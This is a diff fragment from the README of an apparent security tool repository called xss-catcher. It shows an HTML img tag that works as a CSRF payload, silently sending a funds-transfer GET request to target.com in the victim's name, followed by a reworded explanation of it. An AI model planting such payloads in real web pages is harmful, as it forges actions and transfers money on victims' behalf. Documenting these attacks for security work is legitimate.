ivan-sincek/xss-catcher/README.md

 <img src="https://github.com/favicon.ico" alt="csrf" style="background-image: url('https://target.com/transfer.php?recipient=eve&amount=9000');" hidden="hidden">
 ```

-Both examples above will send an HTTP GET request to a target server in the victim's name with user-defined parameters in a query string (i.e. in a URL).
+Both payloads above will send an HTTP GET request to a target server in the victim's name with user-defined parameters in a query string (i.e., in a URL).

 ---